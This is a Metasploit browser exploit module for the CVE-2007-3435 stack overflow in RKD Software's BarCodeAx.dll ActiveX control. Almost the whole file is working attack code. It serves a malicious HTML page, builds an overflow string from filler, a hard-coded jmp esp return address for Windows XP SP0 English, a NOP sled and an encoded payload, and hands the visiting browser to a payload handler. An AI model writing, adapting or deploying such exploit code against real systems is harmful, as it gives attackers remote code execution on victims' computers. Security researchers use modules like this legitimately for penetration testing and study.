##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
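# Browser exploit for the RKD Software BarCodeAx.dll v4.9 ActiveX control
# (CVE-2007-3435). Serves an HTML page that instantiates the control and
# calls BeginPrint() with an oversized string, overflowing a stack buffer.
#
# The single target is Windows XP SP0 English with a hard-coded `jmp esp`
# in ws2_32.dll, so the module assumes no ASLR/DEP and a fixed module base;
# it will not work against any other build without a new return address.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Return address is a `jmp esp` gadget in ws2_32.dll on XP SP0 English.
  # It is placed after 656 bytes of filler, which is the distance from the
  # start of the BeginPrint argument buffer to the saved return address.
  FILLER_LENGTH = 656

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in RKD Software Barcode Application
          ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint
          method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Trancek <trancek[at]yashira.org>', 'aushack' ],
        'References' => [
          [ 'EDB', '4094' ],
          [ 'OSVDB', '37482' ],
          [ 'BID', '24596' ],
          [ 'CVE', '2007-3435' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 1024,
          # The payload is embedded in a JavaScript string literal inside an HTML
          # page, so NUL, CR/LF, quotes, HTML/URL metacharacters and the backslash
          # must not appear in the encoded bytes.
          'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0
        ],
        'DisclosureDate' => '2007-06-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Opt out of browser_autopwn-style automatic target selection.
  def autofilter
    false
  end

  # Make sure zlib is available so HttpServer can compress responses.
  def check_dependencies
    use_zlib
  end

  # Serve the exploit page to a connecting browser.
  #
  # @param cli [Rex::Socket] connected client
  # @param request [Rex::Proto::Http::Request] the incoming request (unused)
  # @return [void]
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; bail if that fails.
    encoded_payload = regenerate_payload(cli)
    return if encoded_payload.nil?

    # Random identifier for the <object> element so the page has no fixed signature.
    vname = rand_text_alpha(rand(100) + 1)

    # Overflow string: filler up to the saved return address, the `jmp esp`
    # address in little-endian form, a short NOP sled, then the encoded payload.
    # Use the freshly regenerated payload object rather than the module-level
    # `payload` accessor so the bytes sent are exactly the ones generated above.
    #
    # NOTE(review): only the payload is filtered through BadChars. The packed
    # return address ("\xfb\x7b\xab\x71") contains non-ASCII bytes that land
    # raw inside a JS string literal in a page with no declared charset; whether
    # the browser preserves them depends on its encoding handling — confirm on
    # the target before relying on this.
    ret = [target['Ret']].pack('V')
    buff = rand_text_alphanumeric(FILLER_LENGTH) + ret + make_nops(20) + encoded_payload.encoded

    # Build out the message. The HTML lines are intentionally unindented:
    # this is the exact response body sent to the client.
    content = %Q|<html>
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>
<script language='javascript'>
#{vname}.BeginPrint("#{buff}");
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end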